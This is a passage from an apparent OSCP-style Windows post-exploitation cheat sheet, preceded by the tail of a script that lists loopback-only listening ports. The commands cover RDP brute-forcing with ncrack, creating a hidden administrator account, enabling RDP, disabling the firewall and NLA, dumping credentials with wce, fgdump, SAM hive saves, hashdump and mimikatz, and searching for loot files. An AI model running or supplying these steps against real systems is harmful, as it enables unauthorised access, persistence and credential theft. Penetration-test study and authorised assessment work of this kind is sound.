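  TCP    127.0.0.1:1433         0.0.0.0:0              LISTENING       2392
  TCP    [::1]:3306             [::]:0                 LISTENING       3100
  UDP    0.0.0.0:500            *:*                                    1184
EOF
}

echo "== Linux: loopback-only listeners =="
sample_linux | loopback_listeners
echo "== Windows: loopback-only listeners =="
sample_windows | loopback_listeners
```

On a live host, pipe the real command output in (`netstat -anlp | loopback_listeners`) or save it to a file first so the internal-only ports can be recorded in the info-sheet.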
518 | 
519 | ```
520 | # Meterpreter
521 | run get_local_subnets
522 | 
523 | netstat /a
524 | netstat -ano
525 | ```
526 | 
527 | ### Programs running as root/system
528 | 
529 | 
530 | 
531 | ### Installed software
532 | 
533 | ```
534 | # Metasploit
535 | ps
536 | 
537 | tasklist /SVC
538 | net start
539 | reg query HKEY_LOCAL_MACHINE\SOFTWARE
540 | DRIVERQUERY
541 | 
542 | # Look in:
543 | C:\Program files
544 | C:\Program files (x86)
545 | Home directory of the user
546 | ```
547 | 
548 | 
549 | ### Scheduled tasks
550 | 
551 | ```
552 | schtasks /query /fo LIST /v
553 | 
554 | # Check this file:
555 | c:\WINDOWS\SchedLgU.Txt
556 | ```
557 | 
558 | ### Weak passwords
559 | 
560 | Remote desktop
561 | 
562 | ```
563 | ncrack -vv --user george -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
564 | ```
565 | 
566 | ### Useful commands
567 | 
568 | 
569 | **Add user and enable RDP**
570 | 
571 | ```
572 | net user haxxor Haxxor123 /add
573 | net localgroup Administrators haxxor /add
574 | net localgroup "Remote Desktop Users" haxxor /ADD
575 | 
576 | # Enable RDP
577 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
578 | 
579 | # Turn firewall off
580 | netsh firewall set opmode disable
581 | 
582 | # Or like this
583 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
584 | 
585 | # If you get this error:
586 | 
587 | "ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
588 | Failed to connect, CredSSP required by server."
589 | 
590 | # Add this reg key:
591 | 
592 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
593 | ```
594 | 
595 | 
596 | 
597 | ------------------------------------------------------------------------
598 | 
599 | 
600 | 
601 | 
602 | ----------------------------- LOOT LOOT LOOT LOOT -------------------
603 | 
604 | 
605 | 
606 | 
607 | ------------------------------------------------------------------------
608 | 
609 | 
610 | ## Loot
611 | 
612 | - Proof:
613 | - Network secret:
614 | - Passwords and hashes:
615 | - Dualhomed:
616 | - Tcpdump:
617 | - Interesting files:
618 | - Databases:
619 | - SSH-keys:
620 | - Browser:
621 | 
622 | ### Proof
623 | 
624 | ### Network secret
625 | 
626 | ### Passwords and hashes
627 | 
628 | ```
629 | wce32.exe -w
630 | wce64.exe -w
631 | fgdump.exe
632 | 
633 | reg.exe save hklm\sam c:\sam_backup
634 | reg.exe save hklm\security c:\security_backup
635 | reg.exe save hklm\system c:\system
636 | 
637 | # Meterpreter
638 | hashdump
639 | load mimikatz
640 | msv
641 | ```
642 | 
643 | ### Dualhomed
644 | 
645 | ```
646 | ipconfig /all
647 | route print
648 | 
649 | # What other machines have been connected
650 | arp -a
651 | ```
652 | 
653 | ### Tcpdump
654 | 
655 | ```
656 | # Meterpreter
657 | run packetrecorder -li
658 | run packetrecorder -i 1
659 | ```
660 | 
661 | ### Interesting files
662 | 
663 | ```
664 | # Meterpreter
665 | search -f *.txt
666 | search -f *.zip
667 | search -f *.doc
668 | search -f *.xls
669 | search -f config*
670 | search -f *.rar
671 | search -f *.docx
672 | search -f *.sql
673 | 
674 | # How to cat files in meterpreter
675 | cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt
676 | 
677 | # Recursive search
678 | dir /s
679 | ```
680 | 
681 | ### Mail
682 | 
683 | ### Browser
684 | 
685 | - Browser start-page:
686 | - Browser-history:
687 | - Saved passwords:
688 | 
689 | ### Databases
690 | 
691 | ### SSH-keys
692 | 
693 | ## How to replicate:
694 | 
--------------------------------------------------------------------------------